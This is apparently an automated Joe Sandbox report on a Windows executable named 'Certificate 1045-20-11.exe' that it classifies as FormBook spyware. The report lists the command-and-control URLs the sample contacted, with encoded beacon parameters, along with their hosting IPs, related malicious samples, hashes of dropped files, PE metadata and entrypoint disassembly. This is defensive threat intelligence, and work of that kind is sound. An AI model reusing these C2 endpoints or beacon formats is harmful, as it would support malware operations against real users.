                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.goldenjade-travel.com/fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.elettrosistemista.zip/fo8o/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.magmadokum.com/fo8o/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.elettrosistemista.zip/fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.rssnewscast.com/fo8o/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.empowermedeco.com/fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBGtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rssnewscast.com/fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBGtrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.goldenjade-travel.com/fo8o/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.techchains.info/fo8o/false
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.empowermedeco.com/fo8o/?SHqP-p=mxnRnetbtugc.exe, 00000003.00000002.4168533677.0000000004E3A000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003BCA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.empowermedeco.comFGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4168934011.0000000004B2D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000003.00000002.4168533677.00000000044CE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4170196597.0000000006210000.00000004.00000800.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.sedo.com/services/parking.php3FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000003.00000002.4168533677.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000003.00000002.4168533677.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              91.195.240.94
                                                                              		www.rssnewscast.comGermany
                                                                              		47846SEDO-ASDEfalse
                                                                              154.215.72.110
                                                                              		www.3xfootball.comSeychelles
                                                                              		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                              195.110.124.133
                                                                              		elettrosistemista.zipItaly
                                                                              		39729REGISTER-ASITtrue
                                                                              116.50.37.244
                                                                              		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                              		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                              85.159.66.93
                                                                              		natroredirect.natrocdn.comTurkey
                                                                              		34619CIZGITRfalse
                                                                              66.29.149.46
                                                                              		www.techchains.infoUnited States
                                                                              		19538ADVANTAGECOMUSfalse
                                                                              217.196.55.202
                                                                              		empowermedeco.comNorway
                                                                              		29300AS-DIRECTCONNECTNOtrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1560129
                                                                              Start date and time:2024-11-21 12:52:04 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 11m 11s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:8
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Certificate 1045-20-11.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@16/7
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 92%
                                                                              • Number of executed functions: 54
                                                                              • Number of non-executed functions: 291
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: Certificate 1045-20-11.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              06:53:51API Interceptor10535894x Sleep call for process: netbtugc.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              91.195.240.94Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              glued.htaGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              file.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rssnewscast.com/fo8o/
                                                                              154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                              • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                              N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                              • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                              Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                              195.110.124.133Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.elettrosistemista.zip/fo8o/
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • www.elettrosistemista.zip/fo8o/
                                                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.elettrosistemista.zip/fo8o/
                                                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.elettrosistemista.zip/fo8o/
                                                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                              • www.nutrigenfit.online/2vhi/
                                                                              RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                              • www.nutrigenfit.online/2vhi/
                                                                              glued.htaGet hashmaliciousFormBookBrowse
                                                                              • www.elettrosistemista.zip/fo8o/
                                                                              proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                              • www.nutrigenfit.online/xtuc/
                                                                              DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                              • www.nutrigenfit.online/uye5/
                                                                              INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                              • www.nutrigenfit.online/2vhi/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.3xfootball.comCertificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              glued.htaGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              POWERLINE-AS-APPOWERLINEDATACENTERHKCertificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                              • 156.251.17.224
                                                                              Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              https://trackru.top/usGet hashmaliciousUnknownBrowse
                                                                              • 156.244.41.195
                                                                              Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.92.61.37
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.215.72.110
                                                                              Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.92.61.37
                                                                              REGISTER-ASITCertificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              Magnetnaalene.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 195.110.124.133
                                                                              RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              glued.htaGet hashmaliciousFormBookBrowse
                                                                              • 195.110.124.133
                                                                              DONGFONG-TWDongFongTechnologyCoLtdTWCertificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              glued.htaGet hashmaliciousFormBookBrowse
                                                                              • 116.50.37.244
                                                                              8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                                              • 119.15.228.113
                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                              • 159.117.98.68
                                                                              SEDO-ASDECertificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.94
                                                                              8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                              • 91.195.240.19
                                                                              7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                              • 91.195.240.19
                                                                              UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                              • 91.195.240.19

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\aut5DA7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Certificate 1045-20-11.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):270848
                                                                              Entropy (8bit):7.994107944055315
                                                                              Encrypted:true
                                                                              SSDEEP:6144:QuMYjkPUhHrXSKfOuOI1MkSERmvApxe0NNOoTZ/49F2zub:fM6pbSKWNIUlYp3XOk/49F2Kb
                                                                              MD5:2C1AE20B3CF7D697105651BB6521B2C7
                                                                              SHA1:D1F4CA4515FB14685BF1470A58DD326F4EDDE8C1
                                                                              SHA-256:FC8853F20677FE8DED4F79E160E5831730703C967E1811B9C87BD9D5677DCE20
                                                                              SHA-512:C0A88760349A7E9C204EAD6B536886898FA1149D45DE8DC8A142D48257F26ACC48AB34BA1F7B6B00D02BBCAB3215A1B61484DCB7B50C527D33966ED769A5C932
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..t..F270...H......ZT....K1..8BWC1ZWF270H95AP8BWC1ZWF270H95.P8BY\.TW.;...8y.ql*>0.*%)UEQ%.V >V-#cS?w4GY.!W...kb:,U?yK?=.H95AP8B.B8.j&U..(^.|0_.M.m&U.*..}0_.M.k&U.b!Z]|0_.WC1ZWF27`.95.Q9B.+..WF270H95.P:C\B:ZWV670H95AP8B.V1ZWV270h=5APxBWS1ZWD276H95AP8BQC1ZWF270h=5AR8BWC1ZUFr.0H)5A@8BWC!ZWV270H95QP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8By7T"#F27.G=5A@8BWS5ZWV270H95AP8BWC1ZwF2W0H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF27

                                                                              C:\Users\user\AppData\Local\Temp\orographically

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Certificate 1045-20-11.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):270848
                                                                              Entropy (8bit):7.994107944055315
                                                                              Encrypted:true
                                                                              SSDEEP:6144:QuMYjkPUhHrXSKfOuOI1MkSERmvApxe0NNOoTZ/49F2zub:fM6pbSKWNIUlYp3XOk/49F2Kb
                                                                              MD5:2C1AE20B3CF7D697105651BB6521B2C7
                                                                              SHA1:D1F4CA4515FB14685BF1470A58DD326F4EDDE8C1
                                                                              SHA-256:FC8853F20677FE8DED4F79E160E5831730703C967E1811B9C87BD9D5677DCE20
                                                                              SHA-512:C0A88760349A7E9C204EAD6B536886898FA1149D45DE8DC8A142D48257F26ACC48AB34BA1F7B6B00D02BBCAB3215A1B61484DCB7B50C527D33966ED769A5C932
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..t..F270...H......ZT....K1..8BWC1ZWF270H95AP8BWC1ZWF270H95.P8BY\.TW.;...8y.ql*>0.*%)UEQ%.V >V-#cS?w4GY.!W...kb:,U?yK?=.H95AP8B.B8.j&U..(^.|0_.M.m&U.*..}0_.M.k&U.b!Z]|0_.WC1ZWF27`.95.Q9B.+..WF270H95.P:C\B:ZWV670H95AP8B.V1ZWV270h=5APxBWS1ZWD276H95AP8BQC1ZWF270h=5AR8BWC1ZUFr.0H)5A@8BWC!ZWV270H95QP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8By7T"#F27.G=5A@8BWS5ZWV270H95AP8BWC1ZwF2W0H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF27

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.126627911574051
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Certificate 1045-20-11.exe
                                                                              File size:1'196'032 bytes
                                                                              MD5:374bfa99caf54477156253c18125cdc8
                                                                              SHA1:b252c1316f4d9b91e79f64c51365cf65981f64d1
                                                                              SHA256:f605d6db615c055fc80141bf79ab3f541303cf082244b352352bbd982a7aca50
                                                                              SHA512:c73c1b2ce3501abf103ba5586f2e6217dcaf3c551c3e9d4b8e088732ef387a6c3f630cce8bb745bec0f0fa2903fc9bac1577ce1b159cbf1a472099364e927a06
                                                                              SSDEEP:24576:otb20pkaCqT5TBWgNQ7ajmQK273J9BvzK2it6A:xVg5tQ7ajm81jzU5
                                                                              TLSH:9045CF1363DEC361C3B25273BA657741AEBF782506B1F86B2FD8093DE920121525EA73
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                              File Icon

                                                                              Icon Hash:aaf3e3e3938382a0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x425f74
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673E9BF2 [Thu Nov 21 02:33:22 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007FB98C85F83Fh
                                                                              jmp 00007FB98C852854h
                                                                              int3
                                                                              int3
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [esp+10h]
                                                                              mov ecx, dword ptr [esp+14h]
                                                                              mov edi, dword ptr [esp+0Ch]
                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007FB98C8529DAh
                                                                              cmp edi, eax
                                                                              jc 00007FB98C852D3Eh
                                                                              bt dword ptr [004C0158h], 01h
                                                                              jnc 00007FB98C8529D9h
                                                                              rep movsb
                                                                              jmp 00007FB98C852CECh
                                                                              cmp ecx, 00000080h
                                                                              jc 00007FB98C852BA4h
                                                                              mov eax, edi
                                                                              xor eax, esi
                                                                              test eax, 0000000Fh
                                                                              jne 00007FB98C8529E0h
                                                                              bt dword ptr [004BA370h], 01h
                                                                              jc 00007FB98C852EB0h
                                                                              bt dword ptr [004C0158h], 00000000h
                                                                              jnc 00007FB98C852B7Dh
                                                                              test edi, 00000003h
                                                                              jne 00007FB98C852B8Eh
                                                                              test esi, 00000003h
                                                                              jne 00007FB98C852B6Dh
                                                                              bt edi, 02h
                                                                              jnc 00007FB98C8529DFh
                                                                              mov eax, dword ptr [esi]
                                                                              sub ecx, 04h
                                                                              lea esi, dword ptr [esi+04h]
                                                                              mov dword ptr [edi], eax
                                                                              lea edi, dword ptr [edi+04h]
                                                                              bt edi, 03h
                                                                              jnc 00007FB98C8529E3h
                                                                              movq xmm1, qword ptr [esi]
                                                                              sub ecx, 08h
                                                                              lea esi, dword ptr [esi+08h]
                                                                              movq qword ptr [edi], xmm1
                                                                              lea edi, dword ptr [edi+08h]
                                                                              test esi, 00000007h
                                                                              je 00007FB98C852A35h
                                                                              bt esi, 03h
                                                                              jnc 00007FB98C852A88h
                                                                              movdqa xmm1, dqword ptr [esi+00h]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2012 UPD4 build 61030
                                                                              • [RES] VS2012 UPD4 build 61030
                                                                              • [LNK] VS2012 UPD4 build 61030

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5aee4.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x11f0000x6c4c.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
